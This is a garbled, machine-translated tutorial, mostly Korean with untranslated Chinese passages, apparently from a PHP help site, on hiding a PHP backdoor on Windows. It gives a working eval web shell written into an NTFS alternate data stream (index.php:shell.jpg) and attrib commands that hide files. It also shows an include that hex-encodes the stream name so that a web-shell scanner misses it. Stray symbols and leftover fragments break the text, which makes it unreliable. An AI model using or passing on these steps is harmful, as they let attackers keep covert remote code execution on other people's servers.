PHP에서 백도어를 숨기는 방법은 무엇입니까?

PHP에서 백도어를 숨기는 방법: 먼저 시스템 숨김 파일을 만들고 ADS 숨김 파일을 만든 다음 해당 파일을 포함하여 jpd를 사용하고 마지막으로 [index.php:shell.jpg]를 16진수로 인코딩합니다.

PHP에서 백도어를 숨기는 방법:

1.attrib +s +h

시스템 숨김 파일을 만듭니다.

attrib +s +a +r +h / attrib +s +h파일 이름attrib +s +a +r +h  /  attrib +s +h文件名

 

查看隐藏文件

 

二. 利用ADS隐藏文件

　　NTFS交换数据流（Alternate　Data　Streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS数据流，我们可以做很多有趣的事情。(抄的)

 

1.首先创建ADS隐藏文件

在命令行，echo一个数据流进去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

可用 dir/r

숨겨진 파일 보기

II. ADS를 사용하여 파일 숨기기

NTFS 교환 대체 데이터 스트림(ADS)은 NTFS 파일 시스템에서 각 파일이 여러 데이터 스트림을 가질 수 있는 기능입니다. 일반적인 이해는 다른 파일이 특정 파일에 "호스팅"될 수 있지만 리소스 관리자에서는 호스트 파일만 볼 수 있고 호스트 파일을 찾을 수 없다는 것입니다. ADS 데이터 스트림을 사용하여 많은 흥미로운 작업을 수행할 수 있습니다. (복사됨)

1. 먼저 ADS 숨김 파일을 만듭니다

명령줄에서 데이터 스트림을 에코합니다. 예를 들어 인덱스 파일은 일반 파일입니다.

<?php include(‘index.php:shell.jpg‘)?>

이렇게 하면 보이지 않는 index.php:shell.jpg

dir/r 명령을 사용하여

수정 및 삭제

를 볼 수 있습니다.

파일 위치 디렉토리 입력 , 메모장 index.php:shell.jpg

index.php:shell.jpg를 삭제하는 방법?

index.php를 직접 삭제

2. 파일 포함

파일을 포함하여 사용할 수 있는 index.php:shell.jpg를 생성했습니다. 🎜

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>

🎜기술적 사진 공유🎜🎜🎜🎜🎜 위에서 배운 방법으로 include.php🎜🎜🎜🎜🎜🎜🎜🎜🎜숨겨도 안 돼요, 형. 앗, D 실드를 쓸어버리면 바로 폭발합니다. 🎜🎜🎜🎜🎜16진수 인코딩 index.php:shell.jpg🎜rrreee🎜🎜🎜🎜🎜관련 학습 권장 사항: 🎜초보부터 마스터까지 PHP 프로그래밍🎜🎜🎜

위 내용은 PHP에서 백도어를 숨기는 방법은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!